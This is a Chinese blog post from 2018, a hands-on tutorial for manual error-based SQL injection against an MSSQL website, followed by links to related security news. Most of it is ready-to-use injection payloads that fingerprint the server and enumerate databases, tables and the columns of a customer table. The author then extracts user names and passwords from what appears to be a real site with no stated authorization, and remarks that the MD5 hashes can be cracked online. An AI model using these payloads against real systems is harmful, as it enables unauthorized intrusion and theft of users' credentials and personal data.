MSSQL手工注入

原創 晨風灬 2018-09-11 03:27


注入點屏蔽了and語句and 1=2 沒有報錯,就用or語句。


wKiom1lsdFuTL_hRAABAC1JrA_E416.png-wh_50

wKioL1lsdFui1qGTAABatfXPJ0c071.png-wh_50









and (select count(*) from sysobjects)>0 返回正常就是mssql數據庫


wKiom1lsdFzCfQYEAABHiwAsXgQ307.png-wh_50





and 1=(select @@version) 查看版本信息


wKioL1lsdFyB63OdAAA7B1DmCXo820.png-wh_50






and 1=(select db_name())獲取當前所在數據庫名(對其他數據庫沒有權限)

wKioL1lsdFyxDnZXAAA662saejg426.png-wh_50





and 1=(select top 1 name from master..sysdatabases where dbid>4)

獲取第一個數據庫名



wKiom1lsdF2w5mheAAAum_FjHsQ198.png-wh_50





and 1=(select top 1 name from master..sysdatabases where dbid>4 andname <> '第一個數據庫庫名') 獲取第二個數據庫庫名


wKiom1lsdF2AQK0pAAA4qsqPOSs307.png-wh_50





可以繼續爆數據庫:and 1=(select top 1 name from master..sysdatabaseswhere dbid>4 and name <> '第一個庫名' and name <> '第二個庫名')


wKioL1lsdF2D7o75AAA6pRWBzkY999.png-wh_50






以此類推我爆出了6個數據庫

 and 1=(select top 1 name from master..sysdatabases where dbid>4 andname <> '第一個庫名' and name <> '第二個庫名' and name <> '第三個庫名' and name <> '第四個庫名' and name <> '第五個庫名' and name <> '第六個庫名')


wKiom1lsdF6yDxqnAABbpjprb8k702.png-wh_50






獲取第一個當前使用的數據庫表名:and 1=(select top 1 name from sysobjects wherextype='u')


wKioL1lsdF6RkWhRAAAytTvPZtw041.png-wh_50





獲取第二個當前使用的數據庫表名:and 1=(select top 1 name from sysobjects where xtype='u and name <> '第一個數據庫表名')


wKiom1lsdF-SSOCFAAA4A61Zj50653.png-wh_50





以此類推一直把所有表名全部爆出(超痛苦~

 and 1=(select top 1 name from sysobjects wherextype='u' and name <> '1' and name <> '2' and name <> '3' and name <> '4' and name <> '5' and name <> '.......................... and name <> '42')


wKiom1lsdnyzAFP9AAB6Xu1AUyU575.png-wh_50




獲取第一個當前使用的數據庫中的表(CusTomer)中的字段:and 1=(select top 1 name from syscolumns whereid=(select id from sysobjects where name = 'CusTomer'))


wKiom1lsdGDS3SDdAAA0n9DN-9Q962.png-wh_50



同理,一直爆該表的字段,爆完爲止:and 1=(select top 1 name from syscolumns where id= (select id fromsysobjects where name = 'CusTomer')and name <> 'Account' and name<> 'Account_UseMode' and name <> 'Address' and name <>'AvailDate' and name <> 'Bind_IP' and name <> 'ContactType' andname <> 'CreateDate' and name <> 'CusTomer_ID' and name <>'CusTomer_UUID' and name <> 'Discount' and name <> 'Distinction'and name <> 'IDCardNo' and name <> 'LastCheckDate' and name<> 'LastProgID' and name <> 'LastTime' and name <> 'ModiMail'and name <> 'ModiPass' and name <> 'PayMode' and name <>'PBAnswer' and name <> 'PBQuestion' and name <> 'Purchase_Mode' andname <> 'RealName' and name <> 'Status' and name  <> 'UserAge' and name <>'UserDuty' and name <> 'UserMail' and name <> 'UserMemo' and name<> 'UserName' and name <> 'UserPass' and name <>'UserTechPost')

wKiom1lsdwLCmqbnAAB_ykb84Ps790.png-wh_50





獲取第一個當前使用的數據庫中的表(UserPass)中的列(CusTomer)的字段:and 1=(select top1 UserPass from CusTomer)

wKioL1lsd0HBNseSAAA0n9DN-9Q665.png-wh_50





UserName 需要一些技巧,需要編碼:

wKioL1lsdGCjNFa8AABcEzOYIuM448.png-wh_50




賬號密碼都有了,密碼是MD5加密,網上有很多都解密的!




歡迎大佬們多多批評指點!t_0032.gif





                                                                                                                                    晨風

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

微軟和谷歌將在未來 5 年內投資 300 億美元用於網路安全

therfigeln 2021-08-31 11:14:43

託管 DNS 服務雲中的漏洞讓攻擊者監視 DNS 流量

therfigeln 2021-08-13 11:07:08

一個嚴重的亂數產生器缺陷影響了數十億的物聯網設備

therfigeln 2021-08-11 11:07:50

印度版Twitter---Koo,受到嚴重的蠕蟲攻擊!

therfigeln 2021-08-09 11:21:02

報告:2021 年DDoS 攻擊量呈上升趨勢

therfigeln 2021-06-01 13:46:25

黑客入侵富士通ProjectWEB平台,日本多個政府數據被竊取!

therfigeln 2021-05-31 11:23:23

加拿大保險公司guard.me遭網絡攻擊,目前已關閉網站!

therfigeln 2021-05-25 11:43:13

突發!愛爾蘭衛生系統遭黑客攻擊!網上疫苗預約均無法進行!

therfigeln 2021-05-18 11:31:06

你的外賣信息真的安全嗎?當心!Glovo遭受網絡攻擊用戶信息被拿到網上售賣!

therfigeln 2021-05-13 11:17:14

拜登:政府正調查燃油公司黑客攻擊事件:已確定被勒索軟件感染

therfigeln 2021-05-12 11:46:16

【網絡安全】企業加快偵測內部網絡威脅警覺性提高

therfigeln 2021-05-10 13:48:56

美國政府警告Fortinet軟件漏洞恐遭國家黑客開採!

therfigeln 2021-04-08 14:22:09

2018年國內DDOS功擊數據報告

近墨者黒 2019-02-24 12:55:03

信息系統安全管理以及風險管理

hua0221 2019-02-23 13:43:41

SQL注入解決方案-網站遭掛馬解決方案

ifuckyours 2019-02-23 13:40:57